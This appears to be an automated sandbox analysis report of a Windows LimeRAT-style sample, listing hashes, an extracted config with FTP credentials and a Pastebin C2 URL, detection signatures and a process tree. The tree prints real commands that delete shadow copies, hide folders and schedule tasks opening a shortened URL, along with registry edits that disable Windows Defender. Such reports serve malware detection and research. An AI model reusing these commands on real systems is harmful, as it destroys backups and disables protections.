Analysis
max time kernel: 164s
max time network: 164s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 18-06-2024 20:57
Behavioral task: behavioral1
Sample: ccc.exe
Resource: win10v2004-20240611-en
General
Target: ccc.exe
Size: 239KB
MD5: 161cd662c124f1408ccbd57a752a8d5f
SHA1: 7baad97316f0cbf1b35d9b0b2b3a8d19da852d41
SHA256: 61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e
SHA512: ea72216157d4d502febc230700f4fd4279d7aab469a3b44cbafc99730df9431cbb9f64d0ab3e9d239a4faa869aa055a06198622b07a1f0408cfebdc9e23b20ac
SSDEEP: 6144:UCoE/UVPy/oCa+LDZWC9z5UNbbH5knq1diOJN:PozPygCa+DZMGnq1c8
Malware Config
Extracted
Protocol: ftp
Host: ftp.encompossoftware.com
Port: 21
Username: remoteuser
Password: Encomposx99
Extracted
limerat
False
aes_key: 1
antivm: false
c2_url: https://pastebin.com/Fe5fxpeZ
download_payload: false
install: true
install_name: svchost.exe
main_folder: True
payload_url: True
pin_spread: true
sub_folder: False
usb_spread: false
Signatures
Contains code to disable Windows Defender (2 IoCs)
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource | yara_rule
behavioral1/memory/3336-1-0x0000019D64BA0000-0x0000019D64BE2000-memory.dmp | disable_win_def
behavioral1/files/0x000400000001da7a-25.dat | disable_win_def
Modifies WinLogon for persistence (2 TTPs, 2 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\"" | ccc.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\"" | svchost.exe
Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | ccc.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | ccc.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | ccc.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | ccc.exe
Modifies security service (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | ccc.exe
Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | ccc.exe
Executes dropped EXE (1 IoCs)
pid | Process
984 | svchost.exe
Enumerates connected drives (3 TTPs, 15 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\g: | vssadmin.exe
File opened (read-only) | \??\e: | vssadmin.exe
File opened (read-only) | \??\D: | vssadmin.exe
File opened (read-only) | \??\E: | vssadmin.exe
File opened (read-only) | \??\G: | vssadmin.exe
File opened (read-only) | \??\h: | vssadmin.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\E: | vssadmin.exe
File opened (read-only) | \??\h: | vssadmin.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\e: | vssadmin.exe
File opened (read-only) | \??\G: | vssadmin.exe
File opened (read-only) | \??\H: | vssadmin.exe
File opened (read-only) | \??\H: | vssadmin.exe
File opened (read-only) | \??\g: | vssadmin.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 64 IoCs)
Hide Artifacts: Hidden Files and Directories (1 TTPs, 2 IoCs)
pid | Process
4644 | cmd.exe
3680 | cmd.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Disables Windows logging functionality (2 TTPs)
Changes registry settings to disable Windows Event logging.
Interacts with shadow copies (3 TTPs, 12 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
4796 | vssadmin.exe
1528 | vssadmin.exe
2768 | vssadmin.exe
896 | vssadmin.exe
4676 | vssadmin.exe
2004 | vssadmin.exe
2196 | vssadmin.exe
2060 | vssadmin.exe
1176 | vssadmin.exe
740 | vssadmin.exe
4036 | vssadmin.exe
3860 | vssadmin.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 5 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
5044 | schtasks.exe
2428 | schtasks.exe
2320 | schtasks.exe
3748 | schtasks.exe
4520 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (8 IoCs)
pid | Process
3336 | ccc.exe
3336 | ccc.exe
3336 | ccc.exe
2420 | powershell.exe
2420 | powershell.exe
984 | svchost.exe
984 | svchost.exe
984 | svchost.exe
Suspicious use of AdjustPrivilegeToken (9 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3336 | ccc.exe
Token: SeDebugPrivilege | 2420 | powershell.exe
Token: SeBackupPrivilege | 2400 | vssvc.exe
Token: SeRestorePrivilege | 2400 | vssvc.exe
Token: SeAuditPrivilege | 2400 | vssvc.exe
Token: SeBackupPrivilege | 3336 | ccc.exe
Token: SeSecurityPrivilege | 3336 | ccc.exe
Token: SeBackupPrivilege | 3336 | ccc.exe
Token: SeDebugPrivilege | 984 | svchost.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Views/modifies file attributes (1 TTPs, 4 IoCs)
pid | Process
2764 | attrib.exe
744 | attrib.exe
2832 | attrib.exe
2120 | attrib.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\ccc.exe (PID 3336)
    Command line: "C:\Users\Admin\AppData\Local\Temp\ccc.exe"
    - Modifies WinLogon for persistence
    - Modifies Windows Defender Real-time Protection settings
    - Modifies security service
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 4644)
        Command line: cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        - Hide Artifacts: Hidden Files and Directories
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\attrib.exe (PID 2764)
            Command line: attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
            - Views/modifies file attributes
        [3] C:\Windows\system32\attrib.exe (PID 744)
            Command line: attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
            - Views/modifies file attributes
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2420)
        Command line: "powershell" Get-MpPreference -verbose
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 2016)
        Command line: cmd /c vssadmin Delete Shadows /all /quiet
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 1528)
            Command line: vssadmin Delete Shadows /all /quiet
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 1200)
        Command line: cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 2736)
            Command line: vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 5020)
        Command line: cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 4036)
            Command line: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 4920)
        Command line: cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 4676)
            Command line: vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
            - Enumerates connected drives
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 4116)
        Command line: cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 4796)
            Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 4656)
        Command line: cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 740)
            Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
            - Enumerates connected drives
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 972)
        Command line: cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 1176)
            Command line: vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 4228)
        Command line: cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 896)
            Command line: vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
            - Enumerates connected drives
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 1608)
        Command line: cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 2060)
            Command line: vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 2924)
        Command line: cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 3860)
            Command line: vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
            - Enumerates connected drives
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 4368)
        Command line: cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 2768)
            Command line: vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
            - Enumerates connected drives
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 4896)
        Command line: cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 2196)
            Command line: vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
            - Enumerates connected drives
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\cmd.exe (PID 5100)
        Command line: cmd /c Vssadmin delete shadowstorage /all /quiet
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe (PID 2004)
            Command line: Vssadmin delete shadowstorage /all /quiet
            - Interacts with shadow copies
    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 3748)
        Command line: schtasks /create /f /st "06:39" /sc daily /mo "2" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        - Scheduled Task/Job: Scheduled Task
    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 2320)
        Command line: schtasks /create /f /st "07:55" /sc daily /mo "4" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        - Scheduled Task/Job: Scheduled Task
    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 4520)
        Command line: schtasks /create /f /st "17:29" /sc daily /mo "5" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        - Scheduled Task/Job: Scheduled Task
    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 2428)
        Command line: schtasks /create /f /st "15:00" /sc weekly /mo "3" /d "Tue" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        - Scheduled Task/Job: Scheduled Task
    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 5044)
        Command line: schtasks /create /f /st "06:57" /sc monthly /m "may" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"
        - Scheduled Task/Job: Scheduled Task
    [2] C:\Users\Admin\AppData\Roaming\Branding\svchost.exe (PID 984)
        Command line: "C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"
        - Modifies WinLogon for persistence
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\SYSTEM32\cmd.exe (PID 3680)
            Command line: cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
            - Hide Artifacts: Hidden Files and Directories
            [4] C:\Windows\system32\attrib.exe (PID 2832)
                Command line: attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
                - Views/modifies file attributes
            [4] C:\Windows\system32\attrib.exe (PID 2120)
                Command line: attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
                - Views/modifies file attributes
[1] C:\Windows\system32\vssvc.exe (PID 2400)
    Command line: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
  Scheduled Task/Job (1): Scheduled Task (1)
  Windows Management Instrumentation (1)
Persistence
  Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
  Create or Modify System Process (2): Windows Service (2)
  Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
  Create or Modify System Process (2): Windows Service (2)
  Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
  Direct Volume Access (1)
  Hide Artifacts (2): Hidden Files and Directories (2)
  Impair Defenses (2): Disable or Modify Tools (2)
  Indicator Removal (2): File Deletion (2)
  Modify Registry (4)
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 239KB
MD5: 161cd662c124f1408ccbd57a752a8d5f
SHA1: 7baad97316f0cbf1b35d9b0b2b3a8d19da852d41
SHA256: 61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e
SHA512: ea72216157d4d502febc230700f4fd4279d7aab469a3b44cbafc99730df9431cbb9f64d0ab3e9d239a4faa869aa055a06198622b07a1f0408cfebdc9e23b20ac